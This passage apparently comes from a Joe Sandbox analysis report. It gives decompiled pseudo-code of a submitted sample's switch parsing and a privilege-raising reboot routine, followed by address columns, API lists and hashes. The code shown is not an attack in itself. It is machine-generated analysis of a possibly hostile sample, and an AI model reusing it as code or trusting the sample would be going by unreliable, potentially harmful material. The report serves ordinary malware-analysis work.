                                                                                                                                                                                                                                            																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                            																				if(_t142 == 0) {
                                                                                                                                                                                                                                            																					_t143 = 2;
                                                                                                                                                                                                                                            																					 *0x10d9a2c =  *0x10d9a2c | _t143;
                                                                                                                                                                                                                                            																					goto L70;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                            																					if(_t145 == 0) {
                                                                                                                                                                                                                                            																						 *0x10d8d48 =  *0x10d8d48 | 0x00000040;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                            																						if(_t146 == 0) {
                                                                                                                                                                                                                                            																							 *0x10d9a2c =  *0x10d9a2c & 0xfffffffd;
                                                                                                                                                                                                                                            																							goto L70;
                                                                                                                                                                                                                                            																						} else {
                                                                                                                                                                                                                                            																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                            																							if(_t147 == 0) {
                                                                                                                                                                                                                                            																								 *0x10d9a2c =  *0x10d9a2c & 0xfffffffe;
                                                                                                                                                                                                                                            																								goto L70;
                                                                                                                                                                                                                                            																							} else {
                                                                                                                                                                                                                                            																								_t149 = _t147;
                                                                                                                                                                                                                                            																								if(_t149 == 0) {
                                                                                                                                                                                                                                            																									 *0x10d8d48 =  *0x10d8d48 | 0x00000080;
                                                                                                                                                                                                                                            																								} else {
                                                                                                                                                                                                                                            																									if(_t149 == 3) {
                                                                                                                                                                                                                                            																										 *0x10d9a2c =  *0x10d9a2c | 0x00000004;
                                                                                                                                                                                                                                            																										L70:
                                                                                                                                                                                                                                            																										 *0x10d8a28 = 1;
                                                                                                                                                                                                                                            																									} else {
                                                                                                                                                                                                                                            																										_t209 = 0;
                                                                                                                                                                                                                                            																									}
                                                                                                                                                                                                                                            																								}
                                                                                                                                                                                                                                            																							}
                                                                                                                                                                                                                                            																						}
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t144 =  *_t220;
                                                                                                                                                                                                                                            																				_t201 = _t144;
                                                                                                                                                                                                                                            																			} while (_t144 != 0);
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	 *0x10d9a2c = 3;
                                                                                                                                                                                                                                            																	 *0x10d8a28 = 1;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																goto L50;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																if(_t132 == 0) {
                                                                                                                                                                                                                                            																	goto L98;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	L49:
                                                                                                                                                                                                                                            																	_t209 = 0;
                                                                                                                                                                                                                                            																	L50:
                                                                                                                                                                                                                                            																	_t173 = _v272;
                                                                                                                                                                                                                                            																	if( *_t173 != 0) {
                                                                                                                                                                                                                                            																		goto L2;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		break;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L106;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										L34:
                                                                                                                                                                                                                                            										_t209 = 0;
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L131;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *0x10d8a2c != 0 &&  *0x10d8b3e == 0) {
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0x10d9a3c, 0x10d8b3e, 0x104) == 0) {
                                                                                                                                                                                                                                            							_t209 = 0;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t202 = 0x5c;
                                                                                                                                                                                                                                            							 *((char*)(E010D66C8(0x10d8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = _t209;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L131:
                                                                                                                                                                                                                                            			}


































































                                                                                                                                                                                                                                            0x010d5c9e
                                                                                                                                                                                                                                            0x010d5ca9
                                                                                                                                                                                                                                            0x010d5cb0
                                                                                                                                                                                                                                            0x010d5cb3
                                                                                                                                                                                                                                            0x010d5cb6
                                                                                                                                                                                                                                            0x010d5cb7
                                                                                                                                                                                                                                            0x010d5cb8
                                                                                                                                                                                                                                            0x010d5cbd
                                                                                                                                                                                                                                            0x010d6204
                                                                                                                                                                                                                                            0x010d5ccb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5ccb
                                                                                                                                                                                                                                            0x010d5cd3
                                                                                                                                                                                                                                            0x010d5cd7
                                                                                                                                                                                                                                            0x010d5cf4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5cf4
                                                                                                                                                                                                                                            0x010d5cf8
                                                                                                                                                                                                                                            0x010d5d00
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5d06
                                                                                                                                                                                                                                            0x010d5d06
                                                                                                                                                                                                                                            0x010d5d0e
                                                                                                                                                                                                                                            0x010d5d10
                                                                                                                                                                                                                                            0x010d5d12
                                                                                                                                                                                                                                            0x010d5d14
                                                                                                                                                                                                                                            0x010d5d15
                                                                                                                                                                                                                                            0x010d5d17
                                                                                                                                                                                                                                            0x010d5d49
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5d19
                                                                                                                                                                                                                                            0x010d5d19
                                                                                                                                                                                                                                            0x010d5d1d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5d3f
                                                                                                                                                                                                                                            0x010d5d3f
                                                                                                                                                                                                                                            0x010d5d4b
                                                                                                                                                                                                                                            0x010d5d4b
                                                                                                                                                                                                                                            0x010d5d4f
                                                                                                                                                                                                                                            0x010d5d8d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5d93
                                                                                                                                                                                                                                            0x010d5d93
                                                                                                                                                                                                                                            0x010d5d9a
                                                                                                                                                                                                                                            0x010d5d9d
                                                                                                                                                                                                                                            0x010d5d9e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5d9e
                                                                                                                                                                                                                                            0x010d5d51
                                                                                                                                                                                                                                            0x010d5d5b
                                                                                                                                                                                                                                            0x010d5d72
                                                                                                                                                                                                                                            0x010d60fb
                                                                                                                                                                                                                                            0x010d60fb
                                                                                                                                                                                                                                            0x010d6207
                                                                                                                                                                                                                                            0x010d620a
                                                                                                                                                                                                                                            0x010d620b
                                                                                                                                                                                                                                            0x010d620e
                                                                                                                                                                                                                                            0x010d6217
                                                                                                                                                                                                                                            0x010d5d78
                                                                                                                                                                                                                                            0x010d5d78
                                                                                                                                                                                                                                            0x010d5d80
                                                                                                                                                                                                                                            0x010d5d83
                                                                                                                                                                                                                                            0x010d5d84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5d84
                                                                                                                                                                                                                                            0x010d5d5d
                                                                                                                                                                                                                                            0x010d5d5f
                                                                                                                                                                                                                                            0x010d5d62
                                                                                                                                                                                                                                            0x010d5d68
                                                                                                                                                                                                                                            0x010d5d64
                                                                                                                                                                                                                                            0x010d5d64
                                                                                                                                                                                                                                            0x010d5d64
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5d62
                                                                                                                                                                                                                                            0x010d5d5b
                                                                                                                                                                                                                                            0x010d5d4f
                                                                                                                                                                                                                                            0x010d5d1d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5d9f
                                                                                                                                                                                                                                            0x010d5d9f
                                                                                                                                                                                                                                            0x010d5da5
                                                                                                                                                                                                                                            0x010d5dab
                                                                                                                                                                                                                                            0x010d5dba
                                                                                                                                                                                                                                            0x010d6218
                                                                                                                                                                                                                                            0x010d621d
                                                                                                                                                                                                                                            0x010d6220
                                                                                                                                                                                                                                            0x010d6221
                                                                                                                                                                                                                                            0x010d6229
                                                                                                                                                                                                                                            0x010d6230
                                                                                                                                                                                                                                            0x010d6247
                                                                                                                                                                                                                                            0x010d626a
                                                                                                                                                                                                                                            0x010d6272
                                                                                                                                                                                                                                            0x010d6249
                                                                                                                                                                                                                                            0x010d6255
                                                                                                                                                                                                                                            0x010d625f
                                                                                                                                                                                                                                            0x010d6264
                                                                                                                                                                                                                                            0x010d6264
                                                                                                                                                                                                                                            0x010d6284
                                                                                                                                                                                                                                            0x010d5dc0
                                                                                                                                                                                                                                            0x010d5dc0
                                                                                                                                                                                                                                            0x010d5dca
                                                                                                                                                                                                                                            0x010d5e22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5dcc
                                                                                                                                                                                                                                            0x010d5dce
                                                                                                                                                                                                                                            0x010d5e24
                                                                                                                                                                                                                                            0x010d5e24
                                                                                                                                                                                                                                            0x010d5e2c
                                                                                                                                                                                                                                            0x010d5e47
                                                                                                                                                                                                                                            0x010d5e4a
                                                                                                                                                                                                                                            0x010d61d2
                                                                                                                                                                                                                                            0x010d61e2
                                                                                                                                                                                                                                            0x010d61e7
                                                                                                                                                                                                                                            0x010d61ee
                                                                                                                                                                                                                                            0x010d61f1
                                                                                                                                                                                                                                            0x010d61f1
                                                                                                                                                                                                                                            0x010d61f8
                                                                                                                                                                                                                                            0x010d61f8
                                                                                                                                                                                                                                            0x010d5e50
                                                                                                                                                                                                                                            0x010d5e53
                                                                                                                                                                                                                                            0x010d6109
                                                                                                                                                                                                                                            0x010d611f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6125
                                                                                                                                                                                                                                            0x010d6137
                                                                                                                                                                                                                                            0x010d613a
                                                                                                                                                                                                                                            0x010d613c
                                                                                                                                                                                                                                            0x010d613e
                                                                                                                                                                                                                                            0x010d613e
                                                                                                                                                                                                                                            0x010d6141
                                                                                                                                                                                                                                            0x010d6141
                                                                                                                                                                                                                                            0x010d6143
                                                                                                                                                                                                                                            0x010d6144
                                                                                                                                                                                                                                            0x010d614a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6150
                                                                                                                                                                                                                                            0x010d6152
                                                                                                                                                                                                                                            0x010d615c
                                                                                                                                                                                                                                            0x010d6170
                                                                                                                                                                                                                                            0x010d6172
                                                                                                                                                                                                                                            0x010d617c
                                                                                                                                                                                                                                            0x010d6190
                                                                                                                                                                                                                                            0x010d6190
                                                                                                                                                                                                                                            0x010d6196
                                                                                                                                                                                                                                            0x010d61a5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d61ab
                                                                                                                                                                                                                                            0x010d61b9
                                                                                                                                                                                                                                            0x010d61c6
                                                                                                                                                                                                                                            0x010d61c6
                                                                                                                                                                                                                                            0x010d617e
                                                                                                                                                                                                                                            0x010d6180
                                                                                                                                                                                                                                            0x010d618a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d618a
                                                                                                                                                                                                                                            0x010d615e
                                                                                                                                                                                                                                            0x010d6160
                                                                                                                                                                                                                                            0x010d616a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d616a
                                                                                                                                                                                                                                            0x010d615c
                                                                                                                                                                                                                                            0x010d614a
                                                                                                                                                                                                                                            0x010d610b
                                                                                                                                                                                                                                            0x010d610e
                                                                                                                                                                                                                                            0x010d610e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5e59
                                                                                                                                                                                                                                            0x010d5e59
                                                                                                                                                                                                                                            0x010d5e5c
                                                                                                                                                                                                                                            0x010d604f
                                                                                                                                                                                                                                            0x010d6056
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d605c
                                                                                                                                                                                                                                            0x010d606e
                                                                                                                                                                                                                                            0x010d6071
                                                                                                                                                                                                                                            0x010d6073
                                                                                                                                                                                                                                            0x010d6075
                                                                                                                                                                                                                                            0x010d6075
                                                                                                                                                                                                                                            0x010d6078
                                                                                                                                                                                                                                            0x010d6078
                                                                                                                                                                                                                                            0x010d607a
                                                                                                                                                                                                                                            0x010d607b
                                                                                                                                                                                                                                            0x010d6081
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6087
                                                                                                                                                                                                                                            0x010d6087
                                                                                                                                                                                                                                            0x010d608d
                                                                                                                                                                                                                                            0x010d609c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d60a2
                                                                                                                                                                                                                                            0x010d60aa
                                                                                                                                                                                                                                            0x010d60b2
                                                                                                                                                                                                                                            0x010d60b7
                                                                                                                                                                                                                                            0x010d60bd
                                                                                                                                                                                                                                            0x010d60bf
                                                                                                                                                                                                                                            0x010d60bf
                                                                                                                                                                                                                                            0x010d60d6
                                                                                                                                                                                                                                            0x010d60e0
                                                                                                                                                                                                                                            0x010d60e7
                                                                                                                                                                                                                                            0x010d60f5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d60f5
                                                                                                                                                                                                                                            0x010d609c
                                                                                                                                                                                                                                            0x010d6081
                                                                                                                                                                                                                                            0x010d5e62
                                                                                                                                                                                                                                            0x010d5e62
                                                                                                                                                                                                                                            0x010d5e65
                                                                                                                                                                                                                                            0x010d5fd3
                                                                                                                                                                                                                                            0x010d5fe9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5fef
                                                                                                                                                                                                                                            0x010d5fef
                                                                                                                                                                                                                                            0x010d5ff7
                                                                                                                                                                                                                                            0x010d5ffd
                                                                                                                                                                                                                                            0x010d6003
                                                                                                                                                                                                                                            0x010d6006
                                                                                                                                                                                                                                            0x010d6011
                                                                                                                                                                                                                                            0x010d6014
                                                                                                                                                                                                                                            0x010d603d
                                                                                                                                                                                                                                            0x010d6016
                                                                                                                                                                                                                                            0x010d6018
                                                                                                                                                                                                                                            0x010d6019
                                                                                                                                                                                                                                            0x010d601b
                                                                                                                                                                                                                                            0x010d6033
                                                                                                                                                                                                                                            0x010d601d
                                                                                                                                                                                                                                            0x010d6020
                                                                                                                                                                                                                                            0x010d6029
                                                                                                                                                                                                                                            0x010d6022
                                                                                                                                                                                                                                            0x010d6022
                                                                                                                                                                                                                                            0x010d6022
                                                                                                                                                                                                                                            0x010d6020
                                                                                                                                                                                                                                            0x010d601b
                                                                                                                                                                                                                                            0x010d6042
                                                                                                                                                                                                                                            0x010d6044
                                                                                                                                                                                                                                            0x010d6046
                                                                                                                                                                                                                                            0x010d604a
                                                                                                                                                                                                                                            0x010d5ff7
                                                                                                                                                                                                                                            0x010d5fd5
                                                                                                                                                                                                                                            0x010d5fd8
                                                                                                                                                                                                                                            0x010d5fd8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5e6b
                                                                                                                                                                                                                                            0x010d5e6b
                                                                                                                                                                                                                                            0x010d5e6e
                                                                                                                                                                                                                                            0x010d5f8b
                                                                                                                                                                                                                                            0x010d5f99
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5f9f
                                                                                                                                                                                                                                            0x010d5fa7
                                                                                                                                                                                                                                            0x010d5faf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5fb1
                                                                                                                                                                                                                                            0x010d5fb3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5fb5
                                                                                                                                                                                                                                            0x010d5fb7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5fb9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5fb9
                                                                                                                                                                                                                                            0x010d5fb7
                                                                                                                                                                                                                                            0x010d5fb3
                                                                                                                                                                                                                                            0x010d5faf
                                                                                                                                                                                                                                            0x010d5f8d
                                                                                                                                                                                                                                            0x010d5f8d
                                                                                                                                                                                                                                            0x010d5f8d
                                                                                                                                                                                                                                            0x010d5f8f
                                                                                                                                                                                                                                            0x010d5fc1
                                                                                                                                                                                                                                            0x010d5fc1
                                                                                                                                                                                                                                            0x010d5fc1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5e74
                                                                                                                                                                                                                                            0x010d5e74
                                                                                                                                                                                                                                            0x010d5e77
                                                                                                                                                                                                                                            0x010d5ea0
                                                                                                                                                                                                                                            0x010d5ebd
                                                                                                                                                                                                                                            0x010d5f79
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5f7f
                                                                                                                                                                                                                                            0x010d5ec3
                                                                                                                                                                                                                                            0x010d5ec3
                                                                                                                                                                                                                                            0x010d5ecc
                                                                                                                                                                                                                                            0x010d5ed4
                                                                                                                                                                                                                                            0x010d5ed6
                                                                                                                                                                                                                                            0x010d5edc
                                                                                                                                                                                                                                            0x010d5edf
                                                                                                                                                                                                                                            0x010d5eea
                                                                                                                                                                                                                                            0x010d5eed
                                                                                                                                                                                                                                            0x010d5f3f
                                                                                                                                                                                                                                            0x010d5f40
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5eef
                                                                                                                                                                                                                                            0x010d5eef
                                                                                                                                                                                                                                            0x010d5ef2
                                                                                                                                                                                                                                            0x010d5f34
                                                                                                                                                                                                                                            0x010d5ef4
                                                                                                                                                                                                                                            0x010d5ef4
                                                                                                                                                                                                                                            0x010d5ef7
                                                                                                                                                                                                                                            0x010d5f2b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5ef9
                                                                                                                                                                                                                                            0x010d5ef9
                                                                                                                                                                                                                                            0x010d5efc
                                                                                                                                                                                                                                            0x010d5f22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5efe
                                                                                                                                                                                                                                            0x010d5eff
                                                                                                                                                                                                                                            0x010d5f02
                                                                                                                                                                                                                                            0x010d5f16
                                                                                                                                                                                                                                            0x010d5f04
                                                                                                                                                                                                                                            0x010d5f07
                                                                                                                                                                                                                                            0x010d5f0d
                                                                                                                                                                                                                                            0x010d5f46
                                                                                                                                                                                                                                            0x010d5f46
                                                                                                                                                                                                                                            0x010d5f09
                                                                                                                                                                                                                                            0x010d5f09
                                                                                                                                                                                                                                            0x010d5f09
                                                                                                                                                                                                                                            0x010d5f07
                                                                                                                                                                                                                                            0x010d5f02
                                                                                                                                                                                                                                            0x010d5efc
                                                                                                                                                                                                                                            0x010d5ef7
                                                                                                                                                                                                                                            0x010d5ef2
                                                                                                                                                                                                                                            0x010d5f4c
                                                                                                                                                                                                                                            0x010d5f4e
                                                                                                                                                                                                                                            0x010d5f50
                                                                                                                                                                                                                                            0x010d5f54
                                                                                                                                                                                                                                            0x010d5ed4
                                                                                                                                                                                                                                            0x010d5ea2
                                                                                                                                                                                                                                            0x010d5ea4
                                                                                                                                                                                                                                            0x010d5eaf
                                                                                                                                                                                                                                            0x010d5eaf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5e79
                                                                                                                                                                                                                                            0x010d5e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5e83
                                                                                                                                                                                                                                            0x010d5e83
                                                                                                                                                                                                                                            0x010d5e83
                                                                                                                                                                                                                                            0x010d5e85
                                                                                                                                                                                                                                            0x010d5e85
                                                                                                                                                                                                                                            0x010d5e8e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5e94
                                                                                                                                                                                                                                            0x010d5e8e
                                                                                                                                                                                                                                            0x010d5e7d
                                                                                                                                                                                                                                            0x010d5e77
                                                                                                                                                                                                                                            0x010d5e6e
                                                                                                                                                                                                                                            0x010d5e65
                                                                                                                                                                                                                                            0x010d5e5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5dd0
                                                                                                                                                                                                                                            0x010d5dd0
                                                                                                                                                                                                                                            0x010d5dd0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5dd0
                                                                                                                                                                                                                                            0x010d5dce
                                                                                                                                                                                                                                            0x010d5dca
                                                                                                                                                                                                                                            0x010d5dba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5d00
                                                                                                                                                                                                                                            0x010d5dd9
                                                                                                                                                                                                                                            0x010d5e04
                                                                                                                                                                                                                                            0x010d61fe
                                                                                                                                                                                                                                            0x010d5e0a
                                                                                                                                                                                                                                            0x010d5e0c
                                                                                                                                                                                                                                            0x010d5e17
                                                                                                                                                                                                                                            0x010d5e17
                                                                                                                                                                                                                                            0x010d5e04
                                                                                                                                                                                                                                            0x010d6200
                                                                                                                                                                                                                                            0x010d6200
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharNextA.USER32(?,00000000,?,?), ref: 010D5CEE
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(010D8B3E,00000104,00000000,?,?), ref: 010D5DFC
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 010D5E3E
                                                                                                                                                                                                                                            • CharUpperA.USER32(-00000052), ref: 010D5EE1
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 010D5F6F
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 010D5FA7
                                                                                                                                                                                                                                            • CharUpperA.USER32(-0000004E), ref: 010D6008
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 010D60AA
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,010D1140,00000000,00000040,00000000), ref: 010D61F1
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 010D61F8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                            • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                            • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                            • Opcode ID: d4ad51167d742c183a3a4d72dd566cac846b3f39fc259af342b087e2309d1a30
                                                                                                                                                                                                                                            • Instruction ID: ce8f09d04842bd57c02f33e24f0dace517a9c3a8bda191de84b277cfac7e2e3b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4ad51167d742c183a3a4d72dd566cac846b3f39fc259af342b087e2309d1a30
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75D18971A043455EEF7ADA3C8C487FA3FF1AB56344F0481EADDC6CA185DA7689828F50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                                            			E010D1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                            				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				int _t28;
                                                                                                                                                                                                                                            				signed char _t30;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t41 = __esi;
                                                                                                                                                                                                                                            				_t38 = __edi;
                                                                                                                                                                                                                                            				_t30 = __ecx;
                                                                                                                                                                                                                                            				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						if( *0x10d9a40 != 0) {
                                                                                                                                                                                                                                            							_pop(_t30);
                                                                                                                                                                                                                                            							_t44 = _t46;
                                                                                                                                                                                                                                            							_t13 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                            							_push(_t38);
                                                                                                                                                                                                                                            							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                            								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                            								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                            								_v12 = 2;
                                                                                                                                                                                                                                            								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                            								CloseHandle(_v28);
                                                                                                                                                                                                                                            								_t41 = _t41;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                            										_t25 = 1;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t37 = 0x4f7;
                                                                                                                                                                                                                                            										goto L3;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t37 = 0x4f6;
                                                                                                                                                                                                                                            									goto L4;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t37 = 0x4f5;
                                                                                                                                                                                                                                            								L3:
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								L4:
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								E010D44B9(0, _t37);
                                                                                                                                                                                                                                            								_t25 = 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_pop(_t40);
                                                                                                                                                                                                                                            							return E010D6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t37 = 0x522;
                                                                                                                                                                                                                                            						_t28 = E010D44B9(0, 0x522, 0x10d1140, 0, 0x40, 4);
                                                                                                                                                                                                                                            						if(_t28 != 6) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					__eax = E010D1EA7(__ecx);
                                                                                                                                                                                                                                            					if(__eax != 2) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						return _t28;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x010d1f90
                                                                                                                                                                                                                                            0x010d1f90
                                                                                                                                                                                                                                            0x010d1f93
                                                                                                                                                                                                                                            0x010d1f98
                                                                                                                                                                                                                                            0x010d1fa4
                                                                                                                                                                                                                                            0x010d1fa7
